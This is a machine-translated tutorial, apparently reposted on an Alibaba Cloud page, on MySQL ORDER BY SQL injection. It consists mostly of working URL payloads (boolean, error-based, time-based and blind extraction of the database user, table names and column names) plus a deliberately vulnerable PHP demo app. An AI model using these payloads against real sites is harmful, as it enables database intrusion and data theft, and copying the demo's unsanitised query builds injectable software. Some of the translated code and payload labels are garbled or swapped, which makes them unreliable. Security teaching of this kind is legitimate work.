Mysql Order by Injection summary

Source: Internet
Author: User
Tags rand

What is an ORDER by injection

The content discussed in this article refers to the controllable position order by after the clause, the following order parameter can be controlled
"select * from goods order by $_GET[‘order‘]"

Simple injection judgment

In the early injection of a large number of existence, the useorder byClause to quickly guess the number of columns, and then matchunion selectStatement to Echo. Can be modified byorderThe argument is judged by the large integer to see the echo case. You can refer to the column by its ordinal number without knowing the column name. But after testing, there is no way to do operations likeorder=3-1Andorder=2It's not the same.

http://192.168.239.2:81/?order=11 错误http://192.168.239.2:81/?order=1 正常
Further construction of payload

The previous judgment is not absolute, we need to construct a similar and 1=1 , and 1=2 payload to facilitate the injection of data

http://192.168.239.2:81/?order=IF(1=1,name,price) 通过name字段排序http://192.168.239.2:81/?order=IF(1=2,name,price) 通过price字段排序
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过price字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,price) 通过name字段排序http://192.168.239.2:81/?order=IFNULL(NULL,name) 通过price字段排序

You can observe that the sorting results are different.

http://192.168.239.2:81/?order=rand(1=1) http://192.168.239.2:81/?order=rand(1=2)
Using error

In some cases, it is not possible to know the column name, and it is also less intuitive to judge the difference between two requests, such as the following if statement as an example

return multiple records
http://192.168.239.2:81/?order=IF(1=1,1,(select+1+union+select+2)) 正确http://192.168.239.2:81/?order=IF(1=2,1,(select+1+union+select+2)) 错误
/?order=IF(1=1,1,(select+1+from+information_schema.tables))  正常/?order=IF(1=2,1,(select+1+from+information_schema.tables))  错误
Using RegExp
http://192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) 正常http://192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00))  错误
Using Updatexml
http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1)  正确http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1) 错误
Using Extractvalue
http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正确http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 错误
Time-based blinds,

Note If direct if(1=2,1,SLEEP(2)) , sleep time will become the number of records in the current table, will cause a certain denial of service attacks on the server

/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常响应时间/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒
Data guess

To guess the user () is[email protected]As an example, since only one can guess, it is possible to useSUBSTR,SUBSTRING,MIDAndleftAndrightEach seat string can be segmented precisely. And then it's the comparison operation that can take advantage=,like,regexpsuch as It's important to notelikeis case insensitive

You can learn that the first digit of the user () is the r ASCII code of the 16 binary 0x72

http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正确http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 错误

To guess the table name of the current data

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00))  正确/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误

To guess the name of a column in a specified table name

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 错误
Sqlmap Test

In the absence of filtration, it is possible to detect the injected

Appendix Source Code
<?phpError_reporting (0); Session_Start (); Mysql_connect ("127.0.0.1","Root","Root")or  die("Database Connection Failed"); mysql_select_db ("Sqlidemo")or  die("Select Database Failed");$order=$_get[' Order '] ?$_get[' Order '] :' name ';$sql="Select Id,name,price from Goods order by $order";$result= mysql_query ($sql);$reslist=Array(); while($row= Mysql_fetch_array ($result, Mysql_assoc)) {Array_push ($reslist,$row);}EchoJson_encode ($reslist);
 Create database Sqlidemo;Use   Sqlidemo;Create TableGoods (IDint(4) not NULL Primary KeyAuto_increment, NameChar( +) not NULL, Priceint(4) not NULL); Insert  into goods (name, price) values("Apple", " ten"); Insert  into goods (name, price) values("banana") ; Insert  into goods (name, price) values("Peach") ;
Reference

http://xdxd.love/2016/03/07/order-by%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F/
Https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html
Https://dev.mysql.com/doc/refman/5.7/en/string-functions.html

?

Mysql Order by Injection summary

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.